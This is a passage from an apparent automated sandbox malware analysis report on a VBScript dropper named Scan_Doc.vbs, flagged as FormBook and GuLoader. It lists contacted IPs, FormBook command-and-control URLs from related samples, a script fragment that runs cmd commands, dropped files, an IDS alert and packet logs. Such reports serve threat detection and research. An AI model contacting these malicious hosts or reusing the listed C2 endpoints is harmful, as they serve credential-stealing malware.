                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.yprblqkk.cfdReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        209.142.66.216
                                        		electorhome.comReserved
                                        		53732INNSYSCAtrue
                                        185.53.179.91
                                        		www.hyperpigmentation-91528.bondGermany
                                        		61969TEAMINTERNET-ASDEtrue
                                        76.223.105.230
                                        		apinspect.netUnited States
                                        		16509AMAZON-02UStrue
                                        99.83.196.71
                                        		baroevent.comUnited States
                                        		16509AMAZON-02UStrue
                                        188.166.220.201
                                        		freswe.clickNetherlands
                                        		14061DIGITALOCEAN-ASNUSfalse
                                        150.95.255.38
                                        		www.qsmdrkjw.cfdJapan7506INTERQGMOInternetIncJPtrue

                                        General Information

                                        Joe Sandbox Version:38.0.0 Beryl
                                        Analysis ID:1272266
                                        Start date and time:2023-07-13 09:47:45 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 15m 1s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:11
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:Scan_Doc.vbs
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winVBS@11/4@10/6
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 35.4% (good quality ratio 32.8%)
                                        • Quality average: 76.5%
                                        • Quality standard deviation: 28.7%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 99
                                        • Number of non-executed functions: 154
                                        Cookbook Comments:
                                        • Found application associated with file extension: .vbs
                                        • Override analysis time to 240s for JS/VBS files not yet terminated

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: Scan_Doc.vbs

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        09:48:53API Interceptor1x Sleep call for process: powershell.exe modified
                                        09:49:01API Interceptor1858x Sleep call for process: explorer.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        185.53.179.91E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.credit-cards-54889.com/mi94/?7n-Lh=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7nrLOp=h2JXJD
                                        ekstre_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.credit-cards-54889.com/mi94/?_N6l56=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&3fK0g=JxoL4
                                        ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.credit-cards-54889.com/mi94/?iN64=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7ncHc8=Tv6lQt-XnpBl3ra
                                        ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.credit-cards-54889.com/mi94/?-Z=6lfDx&5jbDpbb=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m
                                        E-DEKONT_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.credit-cards-54889.com/mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m
                                        Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.credit-cards-54889.com/mi94/?w88pk=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&Sr94=9rXXvvGp
                                        Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.credit-cards-54889.com/mi94/?C2JhjJw=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&DDKH4=7ndL1VtpC
                                        SKM_CE_06032023.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.business-analytics-98074.com/ln19/?f8yD3fcp=Cd9HMUOQFdGvrbObYyJeppHWq42yRRvsY4C1LD1028nEhBvHjP2HD2BkskoprsPdI1g5&3fhH=G2MDa68xrHWpoxO0
                                        IaZj04IBl4.exeGet hashmaliciousFormBookBrowse
                                        • www.lab-grown-diamonds-41565.com/pe63/?5je0b=1kcBqgKuhW1GC+4GL86vBxW4LgCWjCHz0fTuvIATFugA7q7Lou1Dp24p2ipx68+vJUvchZNjuQ==&m0DLR=-Z94LdrHbfsXy81
                                        BJO4MdCuuI.exeGet hashmaliciousFormBookBrowse
                                        • www.lab-grown-diamonds-41565.com/pe63/?Ql=FlQTIzmh&C2Mph=1kcBqgKuhW1GC+4GL86vBxW4LgCWjCHz0fTuvIATFugA7q7Lou1Dp24p2ilI2dSveSzN
                                        e-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.dental-implants-51504.com/gg58/?w2=f+qAVkrpQhCd+fRtLWhh8tPPcQuX4UHkUsotdvtoZ6hNEQbVXq4GUhAx34YnXzQjerMx&02=t0GXqDfH
                                        Velv.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.computercodingclasses.com/roz2/?ftTl=9rwdypNX6rv4-&y4G8q0I=iaSseVL5IyoWX3R+Xo29tGp7VCznpYC1Tq8D2Ys/48hV84ZDNBxlTw9zfVwFIBX1L040
                                        zH4aQ6xq4y.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.adhd-treatment-15476.com/kiz0/?yXb=tOhRZnSrT+PouMi/oaBDfs1Vxohc8Iwo5Nyd+WOzzFrznyfI7BpJ39a2zsbu83Ir9xVdw56eYATP9UqvYfju8fpechlMoPRzUw==&7nWp=lTflE2MXJvwlQrEP
                                        IMG-20022891.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.adhd-treatment-15476.com/kiz0/?K0G45zjP=tOhRZnSrT+PouMi/oaBDfs1Vxohc8Iwo5Nyd+WOzzFrznyfI7BpJ39a2zsbu83Ir9xVdw56eYATP9UqvYfju8fpechlMoPRzUw==&w0GPYn=o6AhrTX8S
                                        PO202202AG7.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.adhd-treatment-15476.com/kiz0/?oPSXj=2dtDM&-Zv=tOhRZnSrT+PouMi/oaBDfs1Vxohc8Iwo5Nyd+WOzzFrznyfI7BpJ39a2zsbu83Ir9xVdw56eYATP9UqvYfju8fpechlMoPRzUw==
                                        Quote.jsGet hashmaliciousFormBook, VjW0rmBrowse
                                        • www.computercodingclasses.com/t65q/?bT=lupTryXInl8H2EmCyLorVVhHVWPSKiLM9UzkD5xf6uxo3aaRqo6aAhjTSsJ/HbTkPoqi&5jtl9=6l98bLZ0QJw0bzlP
                                        Order confirmation 5679021.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.badewannekaufdeu.com/he8c/?EFN8=0FNDbfl&kHwX=gFiUwqcwaG6z10IjuYIdKgIRtZFjdBH+2QkeuAYyrVUjJ6uLvHj9q+/PmgW3+TvG9nRv
                                        Urgentn#U00a1 objedn#U00a0vka.pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.cardealsherein.com/d2g7/?5jrL=j0DtnBrpddlTAX&3fWd=+8MO9WAG5+McQhP+VhlFFEQEPMWTJ5N6QzTEwZ/atM/bwddb/8VfphxRCVksYneVVcAA
                                        REQUEST FOR QOUTATION.exeGet hashmaliciousFormBookBrowse
                                        • www.brasalesoffersus.com/s0w6/?GB8h=CzcZFRQpdVHr1P6b67V9qs6oBP40Cegbylso0gmODKf1pluFbMKTyeNVMkwMTOKYCz/8Uehfqw==&BRVDlP=1bgXIBi0
                                        HSBCPA#U007e1.exeGet hashmaliciousFormBook GuLoaderBrowse
                                        • www.botoxsurgeryagencyuk.com/a18a/?3fOHFT=EPLZE+OkfFcH+m9IjrVY9e5eaFwQ3HPN6tvINvZaVsMpg+rthY2QZs67ANSm48KlDmtL&5j=o67xKrnxddhPL

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        INNSYSCAbhcbvcpu.dllGet hashmaliciousQbotBrowse
                                        • 209.142.97.83
                                        SGm02941x4.elfGet hashmaliciousMiraiBrowse
                                        • 192.159.235.238
                                        loligang.x86.elfGet hashmaliciousMiraiBrowse
                                        • 23.183.212.255
                                        https://mandrillapp.com/track/click/31047859/myalumni.mcgill.ca?p=eyJzIjoidTVIVHlBaU5BWENmUkExVU1mZmVQRHpFMGNVIiwidiI6MSwicCI6IntcInVcIjozMTA0Nzg1OSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL215YWx1bW5pLm1jZ2lsbC5jYVxcXC9yZWRpcmVjdC5hc3B4P2xpbmtJRD04MDU4OTAmc2VuZElkPTIwODY5OSZlaWQ9MjI4MzAxJmdpZD0yJnRva2VuVXJsPWh0dHA6XFxcL1xcXC9JbWQuY2xpY2ttYWlzc29sdWNvZXMuY29tLmJyXFxcL2RtbHVZMlZ1ZEM1aWFXNWhaMmhwUUdsdFpDNXZjbWM9XCIsXCJpZFwiOlwiMzI5YThhZTI5MWYwNGYzM2FlN2RiODZjZjkyMjg1NjdcIixcInVybF9pZHNcIjpbXCJkNTdiNDk2ZjAwMDVhNjdhMzViMjAwNDUzOGRkYTM1YTc4NDcwODc1XCJdfSJ9Get hashmaliciousHTMLPhisherBrowse
                                        • 209.142.65.51
                                        https:/apiservices.krxd.net/click_tracker/track?kx_event_uid=LR25EaJr&clk=https%3A%2F%2Fparroquiasanromero.org%2Femail%2Fagreement%2Fsf_rand_string_lowercase6%2F%2F%2F%2FbXJveWVyQGFyYS5jb20=Get hashmaliciousUnknownBrowse
                                        • 209.142.65.51
                                        https://apiservices.krxd.net/click_tracker/track?kx_event_uid=LR25EaJr&clk=https%3A%2F%2Fparroquiasanromero.org%2Femail%2Fagreement%2Fsf_rand_string_lowercase6%2F%2F%2F%2FbXJveWVyQGFyYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                        • 209.142.65.51
                                        https:/apiservices.krxd.net/click_tracker/track?kx_event_uid=LR25EaJr&clk=https%3A%2F%2Fparroquiasanromero.org%2Femail%2Fagreement%2Fsf_rand_string_lowercase6%2F%2F%2F%2FbXJveWVyQGFyYS5jb20=Get hashmaliciousUnknownBrowse
                                        • 209.142.65.51
                                        https://parroquiasanromero.org/email/agreement/sf_rand_string_lowercase6////bXJveWVyQGFyYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                        • 209.142.65.51
                                        https://apiservices.krxd.net/click_tracker/track?kx_event_uid=LR25EaJr&clk=https%3A%2F%2Fparroquiasanromero.org%2Femail%2Fagreement%2Fsf_rand_string_lowercase6%2F%2F%2F%2FSmFjcXVlbGluZV9IZXJuYW5kZXpAaWJjLmRvaS5nb3Y=Get hashmaliciousUnknownBrowse
                                        • 209.142.65.51
                                        Odx7mEGDEy.elfGet hashmaliciousMiraiBrowse
                                        • 192.159.235.245
                                        SW2MPyoSG3.elfGet hashmaliciousMiraiBrowse
                                        • 209.142.53.197
                                        Past Due Invoice ATT876676.htmlGet hashmaliciousHTMLPhisherBrowse
                                        • 209.142.65.51
                                        03.dllGet hashmaliciousQbotBrowse
                                        • 209.142.97.83
                                        03.dllGet hashmaliciousQbotBrowse
                                        • 209.142.97.83
                                        387773.dat.dllGet hashmaliciousCryptOne, QbotBrowse
                                        • 209.142.97.83
                                        malwarez.dllGet hashmaliciousQbotBrowse
                                        • 209.142.97.83
                                        DOC QUOTE 2023Z01000238.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • 209.142.66.77
                                        Repeat Order #18th-January-2023.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                        • 209.142.66.77
                                        80S2OKwUxs.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 209.142.53.199
                                        ako1Zf5E6P.elfGet hashmaliciousMiraiBrowse
                                        • 192.159.235.243

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                        Download File
                                        Process:C:\Windows\explorer.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):984
                                        Entropy (8bit):5.227423502376633
                                        Encrypted:false
                                        SSDEEP:24:Yq6CUXyhm5IUmtQlbNdB6hm5VUmtQlz0Jahm5SUmtQlHZ6T06Mhm5vUmtQlbxdB8:YqDUXycIwbNdUcpwz0JacWwHZ6T06Mcb
                                        MD5:D9512E54D33D06E68E0C0D36726F7776
                                        SHA1:2E2ED852C188E0F96FCF861D7B73B8C479379845
                                        SHA-256:C70B840F192B885EF63C8426B0667EF175424A96DEC79A988C9525AD8E6997D2
                                        SHA-512:AAFCD49F2C87D4D43076CB4C1357FFAC9AB224ADBD4CEB06961755A0D6305D550090DDA34CAAA3C9B2700EF182CC9D6000BAB87A1A31D15A6A9F7565F60BA515
                                        Malicious:false
                                        Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2360844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2350844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2340844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2330844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2320844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2310844864,"LastSwitchedHighPart":30747916,"PrePopulated":true}]}

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.9260988789684415
                                        Encrypted:false
                                        SSDEEP:3:Nlllulb/lj:NllUb/l
                                        MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                        SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                        SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                        SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                        Malicious:false
                                        Preview:@...e................................................@..........

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_io4xzztc.p5s.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r2noxykh.mrg.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        Static File Info

                                        General

                                        File type:Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
                                        Entropy (8bit):3.704605738327414
                                        TrID:
                                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                        • MP3 audio (1001/1) 32.22%
                                        • Lumena CEL bitmap (63/63) 2.03%
                                        • Corel Photo Paint (41/41) 1.32%
                                        File name:Scan_Doc.vbs
                                        File size:398'490 bytes
                                        MD5:eca38e49a376a162a21d257363a2263e
                                        SHA1:80a99c2a933d454b3654d1a7bca7993c1b1355fb
                                        SHA256:a3fd50cd54fa36cec2ee064e52c91d2106701374fcd3e0ad1e22cbf17479ca71
                                        SHA512:90c5b628525d445b33e090eb45f61a66d2b6eceb9b1af20ebbc3f510be93eb8c1770f18e41213cf75c5d3a740e1f12a8b8587e2e4500c24dadb1fe737d7aa197
                                        SSDEEP:3072:l5n5p5XNsn1+7HLDVZBMxzaksTvvspFIsWxXj6ZEYbdHznXmxLJIrCsS4CYuGgs3:cn+NMxzakPIsWxXj6r
                                        TLSH:588470016EEF0009A2A3AACF5BF144A44F3BB9765538C56D515E1A0E07EBDC0BD61FB2
                                        File Content Preview:..D.i.m. .F.S.O.,. .s.h.e.l.l.,. .x.s.l.P.r.o.c.e.s.s.o.r.........S.u.b. .R.u.n.C.m.d.(.C.o.m.m.a.n.d.S.t.r.i.n.g.,. .O.u.t.p.u.t.F.i.l.e.)..... . . . .c.m.d. .=. .".c.m.d. ./.c. .". .+. .C.o.m.m.a.n.d.S.t.r.i.n.g. .+. .". .>.>. .". .+. .O.u.t.p.u.t.F.i.l

                                        File Icon

                                        Icon Hash:68d69b8f86ab9a86

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.376.223.105.23049701802031412 07/13/23-09:50:17.734032TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970180192.168.2.376.223.105.230

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 13, 2023 09:48:52.494731903 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:52.673823118 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:52.675681114 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:52.676951885 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:52.855475903 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:52.855560064 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:52.855632067 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:52.855694056 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:52.856004953 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.033914089 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.033987045 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.034013033 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.034038067 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.034063101 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.034079075 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.034087896 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.034112930 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.034117937 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.034126997 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.034137964 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.034986019 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212061882 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212136030 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212174892 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212210894 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212248087 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212255001 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212306023 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212316036 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212352991 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212388992 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212393999 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212423086 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212424040 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212460041 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212493896 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212527990 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212532043 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212563992 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212629080 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212666035 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212698936 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212734938 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.212738991 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.212770939 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.390516996 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390603065 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390666008 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390712023 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390744925 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390798092 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.390816927 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390856981 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.390876055 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390888929 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.390933990 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.390995026 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391052961 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391058922 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391108990 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391135931 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391218901 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391321898 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391391039 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391402960 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391458035 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391484022 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391547918 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391603947 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391661882 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391663074 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391712904 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391719103 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391777992 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391834021 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391889095 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391890049 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.391938925 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.391946077 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392003059 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392060995 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392121077 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392122984 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.392172098 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.392178059 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392235041 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392321110 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392381907 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392385960 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.392441988 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.392441988 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.392501116 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.395344973 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.570421934 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570513010 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570573092 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570628881 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570645094 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.570689917 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570705891 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.570754051 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570828915 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570880890 CEST4969880192.168.2.3188.166.220.201
